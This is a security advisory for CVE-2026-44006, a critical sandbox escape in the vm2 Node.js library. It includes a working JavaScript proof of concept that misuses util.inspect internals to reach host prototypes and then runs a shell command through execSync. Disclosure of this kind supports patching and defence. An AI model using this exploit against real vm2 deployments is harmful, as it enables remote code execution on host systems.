CVE-2026-44006

CVSS v3.1

Critical

Vector

AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Summary

It is possible to reach BaseHandler.getPrototypeOf, which can be used to get arbitrary prototypes

Details

https://github.com/patriksimek/vm2/blob/408fc855f1cc1bbc2985b029465ee0e732ada433/lib/bridge.js#L655-L658

BaseHandler can be reached via util.inspect (same as https://github.com/patriksimek/vm2/commit/57971fa423abeb66f09e47e18102986549474ca8)

PoC

let obj = {
	subarray: Buffer.prototype.inspect,
	slice: Buffer.prototype.slice,
	hexSlice: () => '',
};

let sym;

obj.slice(10, {
	showHidden: true,
	showProxy: true,
	depth: 10,
	stylize(a) {
		const handler = this.seen && this.seen[1];

		if (handler && handler.getPrototypeOf) {
			gP = handler.getPrototypeOf;
			HObjectProto = gP(gP(gP(gP(Buffer))));
			HObject = HObjectProto.constructor;
			sym = HObject.getOwnPropertySymbols(Buffer.prototype).at(0);
		}
		return a;
	},
});

obj = {
	[sym]: (depth, opt, inspect) => {
		inspect.constructor('return process')()
		.getBuiltinModule('child process')
		.execSync('id', { stdio: 'inherit' });
	},
	valueOf: undefined,
	constructor: undefined,
};

WebAssembly.compileStreaming(obj).catch(() => {});

Impact

Sandbox Escape -> RCE

Fix

Code Injection

Found an issue in the description? Have something to add? Feel free to write us 👾

dbugs@ptsecurity.com

Weakness Enumeration

CWE-94

Related Identifiers

CVE-2026-44006

GHSA-QCP4-V2JJ-FJX8

Affected Products

Vm2

CVE-2026-44006

Summary

Details

PoC

Impact

Weakness Enumeration

Related Identifiers

Affected Products

References · 5